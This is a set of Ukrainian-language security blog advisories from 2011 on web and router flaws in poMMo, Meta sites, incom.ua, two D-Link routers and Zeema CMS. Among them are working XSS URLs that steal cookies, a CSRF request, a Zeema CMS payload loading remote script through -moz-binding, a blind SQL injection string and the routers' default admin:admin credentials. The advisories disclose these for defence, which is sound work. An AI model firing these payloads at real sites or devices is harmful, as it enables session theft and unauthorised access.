Websecurity - Веб безпека

29.10.2011

У липні, 30.07.2011, я знайшов Brute Force, Cross-Site Scripting, Insufficient Anti-automation та Cross-Site Request Forgery уразливості в poMMo. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в poMMo.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

13.12.2011

Brute Force:

http://site/pommo/index.php

XSS:

http://site/pommo/index.php?referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Insufficient Anti-automation:

Має місце IAA в функції “Forgot your password” на сторінці http://site/pommo/index.php.

Використовується текстова капча (яку легко обійти з використанням відповідного алгоритму, або можна використати значення правильної відповіді в параметрі realdeal, що створюється JS-кодом). А також має місце витік емайла адміна.

CSRF/IAA:

Або можна слати запит на пряму до pending.php:

http://site/pommo/user/pending.php?input=a:2:{s:7:%22adminID%22;b:1;s:5:%22Email%22;s:7:%221@1.com%22;}

Немає захисту від автоматизованих запитів та CSRF (капчі). Що дозволяє автоматизовано розсилати листи з підтвердженням на емайл адміна. А також використовувати дану уразливість для проведення XSS атаки.

Уразливі всі версії poMMo (poMMo Aardvark PR16.1 та попередні версії).

Ще влітку 2007 року, 01.08.2007, я знайшов Cross-Site Scripting уразливість на сайті http://translate.meta.ua (а сьогодні я виявив нові уразливості). Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на meta.ua.

XSS:

POST запит на сторінці http://translate.meta.ua в полі “Исходный текст”.

Якщо раніше в них на сайті я виявив одну дірку, то сьогодні, як я перевірив, вони її вже виправили, але додали натомість багато нових дірок .

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий

Причому дана DOM based XSS має місце на всіх сторінках сайта. Про такі випадки я вже писав в статті Уразливості, що мають місце на всьому сайті.

Дані уразливості так досі й висять на сайті (тривалий час). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

В даній добірці уразливості в веб додатках:

• SAP NetWeaver SPML - XML CSRF user creation (деталі)
• Cross-site scripting (XSS) vulnerability in Webmin (деталі)
• redmine security update (деталі)
• SAP NetWeaver - Authentication bypass (Verb Tampering) (деталі)
• movabletype-opensource security update (деталі)
• myBloggie 2.1.6 SQL-Injection, Advanced INSERT INTO Injection technique (деталі)
• Javascript Injection in Microsoft Lync 4.0.7577.0 (деталі)
• JFreeChart - Path Disclosure vulnerability (деталі)
• EQDKP plus Cross Site Scripting and Bypass file extension (деталі)
• moodle security update (деталі)

19.10.2011

У липні, 11.07.2011, я знайшов Cross-Site Scripting та Brute Force уразливості на http://incom.ua - сайті секюріті компанії Інком. Про що вже попередньо повідомляв представникам компанії (але вони забили на ці дірки) і найближчим часом детально сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

Що цікаво, деякий час тому Інком завершив PCI DSS аудит сайта Альфа-Банка. При тому, що я ще торік знайшов численні дірки на www.alfabank.com.ua, про які неодноразово повідомляв представникам банка, але ні в минулому році, ні в цьому, вони так і не спромоглися виправити жодної дірки. Зате знайшли кошти на PCI DSS аудит . Зазначу, що навіть якщо вони виправлять дірки (виявлені в рамках PCI DSS аудиту) в своєму онлайн-банкінгу, все рівно залишиться можливість атак через головний домен, на якому багато уразливостей.

10.12.2011

XSS (для Mozilla та Firefox):

• alert(document.cookie)
• цікавий

Brute Force:

http://incom.ua/administrator/

Дані уразливості досі не виправлені. Використавши Джумлу дирумлу на своєму сайті й при цьому не виправивши дірок в ній, Інком отримав чимало дірок (ці та інші уразливості). І встановлення WAF не виправило ситуації повністю, так як його, при бажанні, можна обійти, що я показав на прикладі цих двох дірок.

У листопаді, 17.11.2011, я виявив численні уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router). Це Predictable Resource Location, Brute Force та Cross-Site Request Forgery уразливості. Це другий advisory з серії записів про уразливості в продуктах D-Link. Попередній був про уразливості в D-Link DSL-500T ADSL Router.

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою.

Predictable Resource Location:

http://192.168.0.50

Адмінка модема розміщується по дефолтному шляху з дефолтним логіном і паролем (admin:admin). Що дозволяє локальним користувачам (що мають доступ до ПК, або по LAN), а також віддаленим користувачам через Інтернет (через CSRF, в тому числі з використанням нищезгаданої CSRF атаки) отримувати доступ до адмінки і змінювати налаштування модема.

Дефолтні вищезгадані налаштування - це звичайна практика у виробників ADSL роутерів та інших мережевих пристроїв, але D-Link в нових своїх пристроях почав змінювати цю ситуацію.

Для захисту від проблем з дефолтним паролем, D-Link зробили в адмінці наступне: при першому заході в адмінку обов’язково потрібно змінити пароль. Тобто перед тим як почати змінювати налаштування, потрібно буде змінити пароль по замовчуванню. І подібний підхід потрібно використовувати всім виробникам мережевих пристроїв. Але Windows-додаток для конфігурування пристрою, що постачається на CD, не змінює пароля, лише змінює інші налаштування точки доступа. Таким чином можна налаштувати пристрій, при цьому залишивши дефолтний пароль, що залишить пристрій вразливим до атак.

Brute Force:

В формі логіна http://192.168.0.50 немає захисту від Brute Force атак. Що дозволить підбирати пароль (якщо він змінений з дефолтного), зокрема при локальній атаці. Наприклад, по LAN зловмисні користувачі або вірус на одному з комп’ютерів може провести атаку для підбору паролю, якщо він був змінений.

CSRF:

Відсутність захисту від Brute Force (такого як капча) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін. Що стане в нагоді при проведенні атак на різні CSRF уразливості в панелі керування, про які я розповім згодом.

В даній добірці уразливості в веб додатках:

• SAP NetWeaver J2EE MeSync – information disclose (деталі)
• vBulletin - Multiple Open Redirects (деталі)
• subversion security update (деталі)
• SAP NetWaver Virus Scan Interface - multiple XSS (деталі)
• PopScript Multiple Vulnerabilities (деталі)
• rails security update (деталі)
• Squiz Matrix - Cross-Site Scripting Vulnerability (деталі)
• SAP NetWeaver TH_GREP module - Code injection vulnerability (NEW) (деталі)
• Multiple Cross-Site Scripting vulnerabilities in BLOG:CMS (деталі)
• fex security update (деталі)

У квітні, 24.04.2011, я виявив численні уразливості в ADSL модемі D-Link DSL-500T ADSL Router. Це Predictable Resource Location, Brute Force та Cross-Site Request Forgery уразливості. Це перший advisory з серії записів про уразливості в продуктах D-Link.

При цьому даний модем я використовую в офісі ще з жовтня 2005, тому по суті про PRL та BF уразливості мені відомо ще з тих пір, а вже стосовно CSRF я перевірив в квітні цього року. Коли почав досліджувати питання безпеки ADSL модемів (і різних роутерів та інших мережевих пристроїв), зокрема ADSL модема Callisto 821+, про численні уразливості в якому я вже розповідав. Дані три уразливості аналогічні діркам в Iskra Callisto 821+.

Predictable Resource Location:

http://192.168.1.1

Адмінка модема розміщується по дефолтному шляху з дефолтним логіном і паролем (admin:admin). Що дозволяє локальним користувачам (що мають доступ до ПК, або по LAN), а також віддаленим користувачам через Інтернет (через CSRF, в тому числі з використанням нищезгаданої CSRF атаки) отримувати доступ до адмінки і змінювати налаштування модема.

Дефолтні вищезгадані налаштування - це звичайна практика у виробників ADSL роутерів, але той же D-Link в нових своїх пристроях почав змінювати цю ситуацію, про що я розповім стосовно іншого пристрою цієї компанії. Але при цьому провайдери повинні вносити зміни, хоча той же Укртелеком цього не робить в модемах Callisto (що він надає своїм клієнтам). При цьому Інтертелеком, що надав нам в аренду цей DSL-500T, як раз змінив дефолтний пароль в адмінці.

Brute Force:

В формі логіна http://192.168.1.1 немає захисту від Brute Force атак. Що дозволить підбирати пароль (якщо він змінений з дефолтного), зокрема при локальній атаці. Наприклад, по LAN зловмисні користувачі або вірус на одному з комп’ютерів може провести атаку для підбору паролю, якщо він був змінений.

CSRF:

Відсутність захисту від Brute Force (такого як капча) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін. Що стане в нагоді при проведенні атак на різні CSRF і XSS уразливості в панелі керування. Які цілком можуть бути в ній, що я можу сказати виходячи з уразливостей в іншому пристрої D-Link, який я купив в листопаді 2011, а також по діркам в Callisto 821+ (тому що дірки в адмінках модемів і роутерів дуже поширені).

В даній добірці уразливості в веб додатках:

• SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay (деталі)
• Cross-Site Scripting vulnerability in Icinga (деталі)
• SAP NetWeaver JavaMailExamples - XSS (деталі)
• Cross-Site Scripting vulnerability in Nagios (деталі)
• Multiple SQL Injections in A Really Simple Chat (ARSC) (деталі)
• SAP NetWeaver ipcpricing - information disclose (деталі)
• XSS in A Really Simple Chat (ARSC) (деталі)
• Apache Archiva Multiple CSRF vulnerability (деталі)
• Apache Archiva Multiple XSS vulnerability (деталі)
• WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability (деталі)

Ще влітку 2007 року, 07.06.2007 та 08.07.2007, я знайшов Cross-Site Scripting уразливості на сайті http://meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на zakon.meta.ua.

XSS:

• alert(document.cookie) (для IE, а з використанням MouseOverJacking можна зробити версію для всіх браузерів)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у 2007 році (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

27.10.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Cross-Site Scripting, SQL Injection та Information Leakage уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Zeema CMS. Це друга частина з великої кількості уразливостей знайдених в даній CMS. Про інші дірки я розповім згодом. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

07.12.2011

Cross-Site Scripting:

http://site/counter/?act=ip&ip_addr=%3Cp%20style=-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)%3E

Атака спрацює в браузерах Mozilla і Firefox.

SQL Injection:

http://site/counter/?act=ip&ip_addr=%27%20and%20benchmark(10000000,md5(now()))%23

Це blind SQL Injection.

Information Leakage:

Статистика сайта http://site/counter/ знаходиться в публічному доступі (і шлях до неї легко дізнатися).

Уразливі всі версії Zeema CMS.